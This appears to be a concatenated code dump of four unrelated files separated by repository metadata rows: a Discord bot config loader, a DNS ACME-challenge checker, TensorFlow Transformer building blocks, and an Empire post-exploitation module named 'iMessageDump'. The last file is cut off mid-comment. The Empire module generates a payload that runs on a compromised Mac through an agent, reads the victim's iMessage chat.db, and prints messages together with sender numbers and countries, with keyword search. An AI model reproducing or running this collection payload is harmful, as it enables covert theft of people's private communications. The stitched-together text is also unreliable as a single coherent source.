log.info("Found `config.yml` file, loading constants from it.")
with open("config.yml", encoding="UTF-8") as f:
user_config = yaml.safe_load(f)
_recursive_update(_CONFIG_YAML, user_config)
def check_required_keys(keys):
"""
Verifies that keys that are set to be required are present in the
loaded configuration.
"""
for key_path in keys:
lookup = _CONFIG_YAML
try:
for key in key_path.split('.'):
lookup = lookup[key]
if lookup is None:
raise KeyError(key)
except KeyError:
log.critical(
f"A configuration for `{key_path}` is required, but was not found. "
"Please set it in `config.yml` or setup an environment variable and try again."
)
raise
try:
required_keys = _CONFIG_YAML['config']['required_keys']
except KeyError:
pass
else:
check_required_keys(required_keys)
class YAMLGetter(type):
"""
Implements a custom metaclass used for accessing
configuration data by simply accessing class attributes.
Supports getting configuration from up to two levels
of nested configuration through `section` and `subsection`.
`section` specifies the YAML configuration section (or "key")
in which the configuration lives, and must be set.
`subsection` is an optional attribute specifying the section
within the section from which configuration should be loaded.
Example Usage:
# config.yml
bot:
prefixes:
direct_message: ''
guild: '!'
# config.py
class Prefixes(metaclass=YAMLGetter):
section = "bot"
subsection = "prefixes"
# Usage in Python code
from config import Prefixes
def get_prefix(bot, message):
if isinstance(message.channel, PrivateChannel):
return Prefixes.direct_message
return Prefixes.guild
"""
subsection = None
def __getattr__(cls, name):
name = name.lower()
try:
if cls.subsection is not None:
return _CONFIG_YAML[cls.section][cls.subsection][name]
return _CONFIG_YAML[cls.section][name]
except KeyError:
dotted_path = '.'.join(
(cls.section, cls.subsection, name)
if cls.subsection is not None else (cls.section, name)
)
log.critical(f"Tried accessing configuration variable at `{dotted_path}`, but it could not be found.")
raise
def __getitem__(cls, name):
return cls.__getattr__(name)
# Dataclasses
class Bot(metaclass=YAMLGetter):
section = "bot"
prefix: str
token: str
class Filter(metaclass=YAMLGetter):
section = "filter"
filter_zalgo: bool
filter_invites: bool
filter_domains: bool
watch_rich_embeds: bool
watch_words: bool
watch_tokens: bool
# Notifications are not expected for "watchlist" type filters
notify_user_zalgo: bool
notify_user_invites: bool
notify_user_domains: bool
ping_everyone: bool
guild_invite_whitelist: List[int]
domain_blacklist: List[str]
word_watchlist: List[str]
token_watchlist: List[str]
channel_whitelist: List[int]
role_whitelist: List[int]
class Cooldowns(metaclass=YAMLGetter):
section = "bot"
subsection = "cooldowns"
tags: int
class Colours(metaclass=YAMLGetter):
section = "style"
subsection = "colours"
soft_red: int
soft_green: int
soft_orange: int
class DuckPond(metaclass=YAMLGetter):
section = "duck_pond"
threshold: int
custom_emojis: List[int]
class Emojis(metaclass=YAMLGetter):
section = "style"
subsection = "emojis"
defcon_disabled: str # noqa: E704
defcon_enabled: str # noqa: E704
defcon_updated: str # noqa: E704
status_online: str
status_offline: str
status_idle: str
status_dnd: str
bullet: str
new: str
pencil: str
cross_mark: str
ducky_yellow: int
ducky_blurple: int
ducky_regal: int
ducky_camo: int
ducky_ninja: int
ducky_devil: int
ducky_tube: int
upvotes: str
comments: str
user: str
class Icons(metaclass=YAMLGetter):
section = "style"
subsection = "icons"
crown_blurple: str
crown_green: str
crown_red: str
defcon_denied: str # noqa: E704
defcon_disabled: str # noqa: E704
defcon_enabled: str # noqa: E704
defcon_updated: str # noqa: E704
filtering: str
guild_update: str
hash_blurple: str
hash_green: str
hash_red: str
message_bulk_delete: str
message_delete: str
message_edit: str
sign_in: str
sign_out: str
token_removed: str
user_ban: str
user_unban: str
user_update: str
user_mute: str
user_unmute: str
user_verified: str
user_warn: str
pencil: str
remind_blurple: str
remind_green: str
remind_red: str
questionmark: str
superstarify: str
unsuperstarify: str
class CleanMessages(metaclass=YAMLGetter):
section = "bot"
subsection = "clean"
message_limit: int
class Categories(metaclass=YAMLGetter):
section = "guild"
subsection = "categories"
python_help: int
class Channels(metaclass=YAMLGetter):
section = "guild"
subsection = "channels"
admins: int
admin_spam: int
announcements: int
big_brother_logs: int
bot: int
checkpoint_test: int
defcon: int
devlog: int
devtest: int
esoteric: int
help_0: int
help_1: int
help_2: int
help_3: int
help_4: int
help_5: int
help_6: int
help_7: int
helpers: int
message_log: int
meta: int
mod_spam: int
mods: int
mod_alerts: int
modlog: int
off_topic_0: int
off_topic_1: int
off_topic_2: int
organisation: int
python: int
reddit: int
talent_pool: int
userlog: int
user_event_a: int
verification: int
class Webhooks(metaclass=YAMLGetter):
section = "guild"
subsection = "webhooks"
talent_pool: int
big_brother: int
reddit: int
duck_pond: int
class Roles(metaclass=YAMLGetter):
section = "guild"
subsection = "roles"
admin: int
announcements: int
champion: int
contributor: int
core_developer: int
helpers: int
jammer: int
moderator: int
muted: int
owner: int
partners: int
rockstars: int
team_leader: int
verified: int # This is the Developers role on PyDis, here named verified for readability reasons.
class Guild(metaclass=YAMLGetter):
section = "guild"
id: int
ignored: List[int]
staff_channels: List[int]
class Keys(metaclass=YAMLGetter):
section = "keys"
site_api: str
class URLs(metaclass=YAMLGetter):
section = "urls"
# Snekbox endpoints
snekbox_eval_api: str
# Discord API endpoints
discord_api: str
discord_invite_api: str
# Misc endpoints
bot_avatar: str
github_bot_repo: str
# Site endpoints
site: str
site_api: str
site_superstarify_api: str
site_logs_api: str
site_logs_view: str
site_reminders_api: str
site_reminders_user_api: str
site_schema: str
site_settings_api: str
site_tags_api: str
site_user_api: str
site_user_complete_api: str
site_infractions: str
site_infractions_user: str
site_infractions_type: str
site_infractions_by_id: str
site_infractions_user_type_current: str
site_infractions_user_type: str
paste_service: str
class Reddit(metaclass=YAMLGetter):
section = "reddit"
subreddits: list
class Wolfram(metaclass=YAMLGetter):
section = "wolfram"
user_limit_day: int
guild_limit_day: int
key: str
class AntiSpam(metaclass=YAMLGetter):
section = 'anti_spam'
clean_offending: bool
ping_everyone: bool
punishment: Dict[str, Dict[str, int]]
rules: Dict[str, Dict[str, int]]
class AntiMalware(metaclass=YAMLGetter):
section = "anti_malware"
whitelist: list
class BigBrother(metaclass=YAMLGetter):
section = 'big_brother'
log_delay: int
header_message_limit: int
class Free(metaclass=YAMLGetter):
section = 'free'
activity_timeout: int
cooldown_rate: int
cooldown_per: float
class Mention(metaclass=YAMLGetter):
section = 'mention'
message_timeout: int
reset_delay: int
class RedirectOutput(metaclass=YAMLGetter):
section = 'redirect_output'
delete_invocation: bool
delete_delay: int
class Event(Enum):
"""
Event names. This does not include every event (for example, raw
events aren't here), but only events used in ModLog for now.
"""
guild_channel_create = "guild_channel_create"
guild_channel_delete = "guild_channel_delete"
guild_channel_update = "guild_channel_update"
guild_role_create = "guild_role_create"
guild_role_delete = "guild_role_delete"
guild_role_update = "guild_role_update"
guild_update = "guild_update"
member_join = "member_join"
member_remove = "member_remove"
member_ban = "member_ban"
member_unban = "member_unban"
member_update = "member_update"
message_delete = "message_delete"
message_edit = "message_edit"
# Debug mode
DEBUG_MODE = True if 'local' in os.environ.get("SITE_URL", "local") else False
# Paths
BOT_DIR = os.path.dirname(__file__)
PROJECT_ROOT = os.path.abspath(os.path.join(BOT_DIR, os.pardir))
# Default role combinations
MODERATION_ROLES = Roles.moderator, Roles.admin, Roles.owner
STAFF_ROLES = Roles.helpers, Roles.moderator, Roles.admin, Roles.owner
# Roles combinations
STAFF_CHANNELS = Guild.staff_channels
# Default Channel combinations
MODERATION_CHANNELS = Channels.admins, Channels.admin_spam, Channels.mod_alerts, Channels.mods, Channels.mod_spam
# Bot replies
NEGATIVE_REPLIES = [
"Noooooo!!",
"Nope.",
"I'm sorry Dave, I'm afraid I can't do that.",
"I don't think so.",
"Not gonna happen.",
"Out of the question.",
"Huh? No.",
"Nah.",
"Naw.",
"Not likely.",
"No way, José.",
"Not in a million years.",
"Fat chance.",
"Certainly not.",
"NEGATORY.",
"Nuh-uh.",
"Not in my house!",
]
POSITIVE_REPLIES = [
"Yep.",
"Absolutely!",
"Can do!",
"Affirmative!",
"Yeah okay.",
"Sure.",
"Sure thing!",
"You're the boss!",
"Okay.",
"No problem.",
"I got you.",
"Alright.",
"You got it!",
"ROGER THAT",
"Of course!",
"Aye aye, cap'n!",
"I'll allow it.",
]
ERROR_REPLIES = [
"Please don't do that.",
"You have to stop.",
"Do you mind?",
"In the future, don't do that.",
"That was a mistake.",
"You blew it.",
"You're bad at computers.",
"Are you trying to kill me?",
"Noooooo!!",
"I can't believe you've done this",
]
| 22.478964
| 114
| 0.657429
|
e0061703b112d00472fb09a4e28a3d4ad9804f01
| 998
|
py
|
Python
|
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import dns.resolver
from time import sleep
def wait_dns_update(d_name: str, text: str, sub: str = "_acme-challenge", interval: int = 60):
sleep(interval)
for x in range(100):
if check_record(d_name, text, sub):
sleep(interval)
exit(0)
else:
sleep(interval)
def check_record(d_name: str, text: str, sub: str = "_acme-challenge"):
try:
answers = dns.resolver.query(sub + '.' + d_name, 'TXT')
print(' query qname:', answers.qname, ' num ans.', len(answers))
for rdata in answers:
for txt_string in rdata.strings:
if txt_string.decode("utf-8") == text:
return True
else:
return False
except dns.resolver.NXDOMAIN:
print("Couldn't find any records (NXDOMAIN)")
return False
except dns.resolver.NoAnswer:
print("Couldn't find any records (NoAnswer)")
return False
| 30.242424
| 94
| 0.576152
|
64677cd5a6d2b800f3db67fbb8e28f96e90f883a
| 14,164
|
py
|
Python
|
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | null | null | null |
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | 5
|
2020-01-28T23:13:35.000Z
|
2022-02-10T00:46:40.000Z
|
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#/usr/bin/python3
'''
Feb. 2019 by kyubyong park.
kbpark.linguist@gmail.com.
https://www.github.com/kyubyong/transformer.
Building blocks for Transformer
'''
import numpy as np
import tensorflow as tf
def ln(inputs, epsilon = 1e-8, scope="ln"):
'''Applies layer normalization. See https://arxiv.org/abs/1607.06450.
inputs: A tensor with 2 or more dimensions, where the first dimension has `batch_size`.
epsilon: A floating number. A very small number for preventing ZeroDivision Error.
scope: Optional scope for `variable_scope`.
Returns:
A tensor with the same shape and data dtype as `inputs`.
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
inputs_shape = inputs.get_shape()
params_shape = inputs_shape[-1:]
mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
beta= tf.get_variable("beta", params_shape, initializer=tf.zeros_initializer())
gamma = tf.get_variable("gamma", params_shape, initializer=tf.ones_initializer())
normalized = (inputs - mean) / ( (variance + epsilon) ** (.5) )
outputs = gamma * normalized + beta
return outputs
def get_token_embeddings(vocab_size, num_units, scope=0,zero_pad=True):
'''Constructs token embedding matrix.
Note that the column of index 0's are set to zeros.
vocab_size: scalar. V.
num_units: embedding dimensionalty. E.
zero_pad: Boolean. If True, all the values of the first row (id = 0) should be constant zero
To apply query/key masks easily, zero pad is turned on.
Returns
weight variable: (V, E)
'''
with tf.variable_scope("shared_weight_matrix"+str(scope)):
embeddings = tf.get_variable('weight_mat',
dtype=tf.float32,
shape=(vocab_size, num_units),
initializer=tf.contrib.layers.xavier_initializer())
if zero_pad:
embeddings = tf.concat((tf.zeros(shape=[1, num_units]),
embeddings[1:, :]), 0)
return embeddings
def scaled_dot_product_attention(Q, K, V, key_masks,
causality=False, dropout_rate=0.,
training=True,
scope="scaled_dot_product_attention", memory=False):
'''See 3.2.1.
Q: Packed queries. 3d tensor. [N, T_q, d_k].
K: Packed keys. 3d tensor. [N, T_k, d_k].
V: Packed values. 3d tensor. [N, T_k, d_v].
key_masks: A 2d tensor with shape of [N, key_seqlen]
causality: If True, applies masking for future blinding
dropout_rate: A floating point number of [0, 1].
training: boolean for controlling droput
scope: Optional scope for `variable_scope`.
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
d_k = Q.get_shape().as_list()[-1]
d_v = V.get_shape().as_list()[-1]
# dot product
#outputs = tf.matmul(Q, tf.transpose(K, [0, 2, 1])) # (N, T_q, T_k)
K = mask(K, key_masks=key_masks, type="key", zero=True)
V = mask(V, key_masks=key_masks, type="key", zero=True)
if not memory:
Q = mask(Q, key_masks=key_masks, type="key", zero=True)
# scale
#outputs /= d_k ** 0.5
# key masking
#outputs = mask(outputs, key_masks=key_masks, type="key")
# causality or future blinding masking
if causality:
outputs = tf.matmul(Q, tf.transpose(K, [0, 2, 1]) / d_k ** 0.5) # (N, T_q, T_k)
outputs = mask(outputs, type="future")
outputs = tf.nn.softmax(outputs)
outputs = tf.matmul(outputs, V) # (N, T_q, d_v)
else:
#length = tf.reduce_sum(1 - tf.to_float(key_masks), axis=-1, keepdims=True)
#length = tf.expand_dims(length, 2)
#length = tf.tile(length, [1, d_k, d_v])
duo = tf.matmul(tf.transpose(K, [0, 2, 1]), V)
outputs = tf.nn.relu(tf.matmul(Q, duo))
# softmax
#outputs = tf.nn.softmax(outputs)
#attention = tf.transpose(outputs, [0, 2, 1])
#tf.summary.image("attention", tf.expand_dims(attention[:1], -1))
# # query masking
# outputs = mask(outputs, Q, K, type="query")
# dropout
outputs = tf.layers.dropout(outputs, rate=dropout_rate, training=training)
# weighted sum (context vectors)
#outputs = tf.matmul(outputs, V) # (N, T_q, d_v)
return outputs
def future_mask(Q, K, V):
duo = 0
outputs = []
for i in range(100):
duo += tf.matmul(tf.transpose(K[:, i:i+1, :], [0, 2, 1]),V[:, i:i+1, :])
outputs.append(tf.matmul(Q[:, i:i+1, :], duo/(i+1)))
outputs = tf.concat(outputs, axis=-2)
return outputs
#print(Q.get_shape().as_list())
#d_q = Q.get_shape().as_list()[-2]
#for i in range(100):
# outputs.append(ln(tf.matmul(tf.matmul(Q[:, i:i+1, :], tf.transpose(K[:, :i+1, :], [0, 2, 1])), V[:, :i+1, :]),scope='in'))
#outputs = tf.concat(outputs, axis=-2)
#return outputs
def mask(inputs, key_masks=None, type=None, zero=False):
"""Masks paddings on keys or queries to inputs
inputs: 3d tensor. (h*N, T_q, T_k)
key_masks: 3d tensor. (N, 1, T_k)
type: string. "key" | "future"
e.g.,
>> inputs = tf.zeros([2, 2, 3], dtype=tf.float32)
>> key_masks = tf.constant([[0., 0., 1.],
[0., 1., 1.]])
>> mask(inputs, key_masks=key_masks, type="key")
array([[[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09],
[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09]],
[[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09],
[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09]],
[[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09],
[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09]],
[[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09],
[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09]]], dtype=float32)
"""
padding_num = -2 ** 32 + 1
if type in ("k", "key", "keys"):
key_masks = tf.to_float(key_masks)
key_masks = tf.tile(key_masks, [tf.shape(inputs)[0] // tf.shape(key_masks)[0], 1]) # (h*N, seqlen)
#key_masks = tf.expand_dims(key_masks, 1) # (h*N, 1, seqlen)
key_masks = tf.tile(tf.expand_dims(key_masks, 2),[1, 1, tf.shape(inputs)[-1]])
if zero:
outputs = inputs * (1. - key_masks)
else:
outputs = inputs + key_masks * padding_num
# elif type in ("q", "query", "queries"):
# # Generate masks
# masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # (N, T_q)
# masks = tf.expand_dims(masks, -1) # (N, T_q, 1)
# masks = tf.tile(masks, [1, 1, tf.shape(keys)[1]]) # (N, T_q, T_k)
#
# # Apply masks to inputs
# outputs = inputs*masks
elif type in ("f", "future", "right"):
diag_vals = tf.ones_like(inputs[0, :, :]) # (T_q, T_k)
tril = tf.linalg.LinearOperatorLowerTriangular(diag_vals).to_dense() # (T_q, T_k)
future_masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(inputs)[0], 1, 1]) # (N, T_q, T_k)
paddings = tf.ones_like(future_masks) * padding_num
outputs = tf.where(tf.equal(future_masks, 0), paddings, inputs)
else:
print("Check if you entered type correctly!")
return outputs
def multihead_attention(queries, keys, values, key_masks,
num_heads=8,
dropout_rate=0,
training=True,
causality=False,
scope="multihead_attention",
memory=False):
'''Applies multihead attention. See 3.2.2
queries: A 3d tensor with shape of [N, T_q, d_model].
keys: A 3d tensor with shape of [N, T_k, d_model].
values: A 3d tensor with shape of [N, T_k, d_model].
key_masks: A 2d tensor with shape of [N, key_seqlen]
num_heads: An int. Number of heads.
dropout_rate: A floating point number.
training: Boolean. Controller of mechanism for dropout.
causality: Boolean. If true, units that reference the future are masked.
scope: Optional scope for `variable_scope`.
Returns
A 3d tensor with shape of (N, T_q, C)
'''
d_model = queries[0].get_shape().as_list()[-1]
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# Linear projections1
Q1 = tf.layers.dense(queries[0], d_model, use_bias=True) # (N, T_q, d_model)
K = tf.layers.dense(keys, d_model, use_bias=True) # (N, T_k, d_model)
V = tf.layers.dense(values, d_model, use_bias=True) # (N, T_k, d_model)
Q2 = tf.layers.dense(queries[1], d_model, use_bias=True) # (N, T_k, d_model)
# Split and concat1
Q1_ = tf.concat(tf.split(Q1, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
K_ = tf.concat(tf.split(K, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
V_ = tf.concat(tf.split(V, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
Q2_ = tf.concat(tf.split(Q2, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
## Linear projections2
#Q2 = tf.layers.dense(queries[1], d_model, use_bias=True) # (N, T_q, d_model)
#K2 = tf.layers.dense(keys[1], d_model, use_bias=True) # (N, T_k, d_model)
#V2 = tf.layers.dense(values[1], d_model, use_bias=True) # (N, T_k, d_model)
#
## Split and concat2
#Q2_ = tf.concat(tf.split(Q2, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
#K2_ = tf.concat(tf.split(K2, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
#V2_ = tf.concat(tf.split(V2, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
# Attention
outputs1 = scaled_dot_product_attention(Q1_, K_, V_, key_masks, causality, dropout_rate, training, memory=memory)
outputs2 = scaled_dot_product_attention(Q2_, V_, K_, key_masks, causality, dropout_rate, training, memory=memory)
# Restore shape
outputs1 = tf.concat(tf.split(outputs1, num_heads, axis=0), axis=2 ) # (N, T_q, d_model)
outputs2 = tf.concat(tf.split(outputs2, num_heads, axis=0), axis=2) # (N, T_q, d_model)
# Residual connection
outputs1 += queries[0]
outputs2 += queries[1]
# Normalize
outputs1 = ln(outputs1)
outputs2 = ln(outputs2)
return outputs1, outputs2
def ff(inputs, num_units, scope="positionwise_feedforward"):
'''position-wise feed forward net. See 3.3
inputs: A 3d tensor with shape of [N, T, C].
num_units: A list of two integers.
scope: Optional scope for `variable_scope`.
Returns:
A 3d tensor with the same shape and dtype as inputs
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# Inner layer
outputs = tf.layers.dense(inputs, num_units[0], activation=tf.nn.relu)
# Outer layer
outputs = tf.layers.dense(outputs, num_units[1])
# Residual connection
outputs += inputs
# Normalize
outputs = ln(outputs)
return outputs
def label_smoothing(inputs, epsilon=0.1):
'''Applies label smoothing. See 5.4 and https://arxiv.org/abs/1512.00567.
inputs: 3d tensor. [N, T, V], where V is the number of vocabulary.
epsilon: Smoothing rate.
For example,
```
import tensorflow as tf
inputs = tf.convert_to_tensor([[[0, 0, 1],
[0, 1, 0],
[1, 0, 0]],
[[1, 0, 0],
[1, 0, 0],
[0, 1, 0]]], tf.float32)
outputs = label_smoothing(inputs)
with tf.Session() as sess:
print(sess.run([outputs]))
>>
[array([[[ 0.03333334, 0.03333334, 0.93333334],
[ 0.03333334, 0.93333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334]],
[[ 0.93333334, 0.03333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334],
[ 0.03333334, 0.93333334, 0.03333334]]], dtype=float32)]
```
'''
V = inputs.get_shape().as_list()[-1] # number of channels
return ((1-epsilon) * inputs) + (epsilon / V)
def positional_encoding(inputs,
maxlen,
masking=True,
scope="positional_encoding"):
'''Sinusoidal Positional_Encoding. See 3.5
inputs: 3d tensor. (N, T, E)
maxlen: scalar. Must be >= T
masking: Boolean. If True, padding positions are set to zeros.
scope: Optional scope for `variable_scope`.
returns
3d tensor that has the same shape as inputs.
'''
E = inputs.get_shape().as_list()[-1] # static
N, T = tf.shape(inputs)[0], tf.shape(inputs)[1] # dynamic
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# position indices
position_ind = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1]) # (N, T)
# First part of the PE function: sin and cos argument
position_enc = np.array([
[pos / np.power(10000, (i-i%2)/E) for i in range(E)]
for pos in range(maxlen)])
# Second part, apply the cosine to even columns and sin to odds.
position_enc[:, 0::2] = np.sin(position_enc[:, 0::2]) # dim 2i
position_enc[:, 1::2] = np.cos(position_enc[:, 1::2]) # dim 2i+1
position_enc = tf.convert_to_tensor(position_enc, tf.float32) # (maxlen, E)
# lookup
outputs = tf.nn.embedding_lookup(position_enc, position_ind)
# masks
if masking:
outputs = tf.where(tf.equal(inputs, 0), inputs, outputs)
return tf.to_float(outputs)
def noam_scheme(init_lr, global_step, warmup_steps=4000.):
'''Noam scheme learning rate decay
init_lr: initial learning rate. scalar.
global_step: scalar.
warmup_steps: scalar. During warmup_steps, learning rate increases
until it reaches init_lr.
'''
step = tf.cast(global_step + 1, dtype=tf.float32)
return init_lr * warmup_steps ** 0.5 * tf.minimum(step * warmup_steps ** -1.5, step ** -0.5)
| 39.344444
| 131
| 0.587616
|
a2fbb6db6ecd4a3c6c550e7f6a9e61792b2b6a16
| 13,383
|
py
|
Python
|
lib/modules/python/collection/osx/imessage_dump.py
|
terrorizer1980/Empire
|
9259e5106986847d2bb770c4289c0c0f1adf2344
|
[
"BSD-3-Clause"
] | 49
|
2015-09-02T15:20:09.000Z
|
2022-03-05T18:18:23.000Z
|
lib/modules/python/collection/osx/imessage_dump.py
|
rmusser01/Empire
|
c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556
|
[
"BSD-3-Clause"
] | 1
|
2020-11-04T08:15:12.000Z
|
2020-11-04T08:15:12.000Z
|
lib/modules/python/collection/osx/imessage_dump.py
|
InfinitelyFreedom/Empire
|
3a922f60d92658fb716efb3be5a1c15074114766
|
[
"BSD-3-Clause"
] | 24
|
2015-09-08T11:45:23.000Z
|
2022-02-07T23:53:58.000Z
|
#!/usr/bin/env python3
from builtins import object
from builtins import str
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'iMessageDump',
# list of one or more authors for the module
'Author': ['Alex Rymdeko-Harvey', '@Killswitch-GUI'],
# more verbose multi-line description of the module
'Description': 'This module will enumerate the entire chat and IMessage SQL Database.',
'Software': '',
'Techniques': ['T1081'],
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# Use on disk execution method, rather than a dynamic exec method
'RunOnDisk' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'Using SQLite3 iMessage has a decent standard to correlate users to messages and isnt encrypted.'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run from.',
'Required' : True,
'Value' : ''
},
'Messages' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The number of messages to enumerate from most recent.',
'Required' : True,
'Value' : '10'
},
'Search' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Enable a find keyword to search for within the iMessage Database.',
'Required' : False,
'Value' : ''
},
'Debug' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Enable a find keyword to search for within the iMessage Database.',
'Required' : True,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
count = self.options['Messages']['Value']
script = "count = " + str(count) + '\n'
if self.options['Debug']['Value']:
debug = self.options['Debug']['Value']
script += "debug = " + str(debug) + '\n'
if self.options['Search']['Value']:
search = self.options['Search']['Value']
script += 'searchPhrase = "' + str(search) + '"\n'
script += """
try:
if searchPhrase:
searchMessage = True
except:
searchMessage = False
searchPhrase = ""
try:
class imessage_dump():
def __init__(self):
try:
print("[*] Message Enumeration Started!")
except Exception as e:
print(e)
def func(self, count, searchMessage, debug, searchPhrase):
try:
import sqlite3
from os.path import expanduser
home = expanduser("~") + '/Library/Messages/chat.db'
# Open the database handle for the user
conn = sqlite3.connect(home)
cur = conn.cursor()
# Query Date, Text message and place it into a array
cur.execute("SELECT date,text,service,account,ROWID FROM message;")
# execute the data enum
statment = cur.fetchall()
# handle: Table links the number, country, type to the chat ID
# SELECT * FROM handle
# ex: (2, u'+12150000000', u'US', u'iMessage', None)
cur.execute("SELECT ROWID,id,country,service FROM handle")
handle = cur.fetchall()
# chat_message_join: Links the chat ID to the Text ID (sequency number)
# SELECT * FROM chat_message_join
cur.execute("SELECT chat_id,message_id FROM chat_message_join")
messageLink = cur.fetchall()
#cur.execute("SELECT account_id,service_center,chat_identifier FROM chat")
#GuidData = cur.fetchall()
# Itterate over data
dictList = []
count = count * -1
for item in statment[count:]:
try:
for messageid in messageLink:
# simple declare to prvent empty values
if str(messageid[1]) == str(item[4]):
chatid = messageid[0]
for rowid in handle:
if str(rowid[0]) == str(chatid):
if rowid[1]:
Number = str(rowid[1])
if rowid[2]:
Country = str(rowid[2])
if rowid[3]:
Type = str(rowid[3])
epoch = self.TimeConv(item[0], debug)
line = {}
try:
if item[4]:
line['ROWID'] = str(item[4])
if item[2]:
line['Service'] = str(item[2])
if item[3]:
line['Account'] = str(item[3])
if epoch:
line['Date'] = str(epoch)
if Number:
line['Number'] = str(Number)
if Country:
line['Country'] = str(Country)
if Type:
line['Type'] = str(Type)
if item[1]:
line['Message'] = str(self.RemoveUnicode(item[1]))
except Exception as e:
if debug:
print(" [Debug] Issues with object creation (line 55): " + str(e))
dictList.append(line)
except Exception as e:
if debug:
print(" [Debug] Isssue at object creation (line 40): " + str(e))
pass
print(e)
conn.close()
x = 0
for dic in dictList:
try:
if searchMessage:
# check for phrase in message
try:
if dic['Message']:
Msg = dic['Message'].lower()
if Msg.find(searchPhrase.lower()) != -1:
for key in list(dic.keys()):
print(" %s : %s" %(key, dic[key]))
x += 1
print('')
except Exception as e:
if debug:
print(" [Debug] At Decode of Dict item for Message search (line 180): " + str(e))
pass
else:
for key in list(dic.keys()):
try:
print(" %s : %s" %(key, dic[key]))
except Exception as e:
if debug:
print(" [Debug] At Decode of Dict item (line 180): " + str(e))
pass
print('')
except Exception as e:
print("[!] Issue Decoding Dict Item: " + str(e))
if searchMessage:
print("[!] Messages Matching Phrase: " + str(x))
print("[!] Messages in DataStore: " + str(len(statment)))
count = count * -1
print("[!] Messages Enumerated: " + str(count))
except Exception as e:
print(e)
# Close the Database handle
def TimeConv(self, epoch, debug):
import datetime
try:
d = datetime.datetime.strptime("01-01-2001", "%m-%d-%Y")
time = (d + datetime.timedelta(seconds=epoch)).strftime("%a, %d %b %Y %H:%M:%S GMT")
return time
except Exception as e:
if debug:
print(" [Debug] Issues Decoding epoch time: " + str(e))
def RemoveUnicode(self, string):
import re
try:
string_data = string
if string_data is None:
return string_data
if isinstance(string_data, str):
string_data = str(string_data.decode('ascii', 'ignore'))
else:
string_data = string_data.encode('ascii', 'ignore')
remove_ctrl_chars_regex = re.compile(r'[^\x20-\x7e]')
CleanString = remove_ctrl_chars_regex.sub('', string_data)
return CleanString
except Exception as e:
p = '[!] UTF8 Decoding issues Matching: ' + str(e)
print(p)
im = imessage_dump()
im.func(count, searchMessage, debug, searchPhrase)
except Exception as e:
print(e)"""
# add any arguments to the end exec
return script
# handle: Table links the number, country, type to the chat ID
# SELECT * FROM handle
# chat_message_join: Links the chat ID to the Text ID (sequency number)
# SELECT * FROM chat_message_join
# INTEGER: A signed integer up to 8 bytes depending on the magnitude of the value.
# REAL: An 8-byte floating point value.
# TEXT: A text string, typically UTF-8 encoded (depending on the database encoding).
# BLOB: A blob of data (binary large object) for storing binary data.
# NULL: A NULL value, represents missing data or an empty cell.
# SQLITE3 message laylout:
# (u'table', u'message', u'message', 5, u'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT,
# guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0,
